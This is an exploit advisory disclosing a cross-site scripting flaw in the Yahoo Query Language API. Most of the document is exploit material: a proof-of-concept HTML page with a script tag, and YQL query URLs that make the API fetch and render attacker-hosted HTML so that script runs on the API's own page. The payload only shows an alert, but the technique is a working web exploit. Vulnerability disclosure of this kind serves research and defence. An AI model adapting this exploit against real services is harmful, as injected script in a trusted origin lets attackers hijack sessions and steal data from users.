/***********************************************************************************
** Exploit Title: Yahoo Query Language Cross Site Scripting 
Vulnerability
**
** Exploit Author: Peyman D. aka C4T
**
** Vendor Homepage : http://query.yahooapis.com/
**
** Google Dork: none
**
** Date: 2015-03-08
**
** Tested on: Windows 7 / Mozila Firefox
**
************************************************************************************
** Exploit Code:
******************

<html xmlns="http://www.w3.org/1999/xhtml">
<body>
<span>Discovered by Peyman D.</span>
<span>aka C4T</span>
<script>
alert('Successfully Exploited');
</script>
</body>
</html>

************************************************************************************
Location & Vulnerable query:
******************

http://query.yahooapis.com/v1/public/yql?q= select * from html where 
url='[attacker-website.com]/exploit.html' and xpath='html'

*************************************************************************************
** Proof:
******************

Executable script tag in API's own page:

Malicious source: http://hatrhyme.com/alert.html
Exploit query:
http://query.yahooapis.com/v1/public/yql?q= select * from html where 
url='http://hatrhyme.com/alert.html' and xpath='html'

-------------------------------------------------------

Injecting HTML tags in API's own page:

Malicious source: http://hatrhyme.com/expl.html
Exploit query:
http://query.yahooapis.com/v1/public/yql?q= select * from html where 
url='http://hatrhyme.com/expl.html' and xpath='html'

-------------------------------------------------------
******************************************************************************************
**
** Explanation and the cause of this vulnerability:
**
** http://hatrhyme.com/XSSInYQL.pdf
**
******************************************************************************************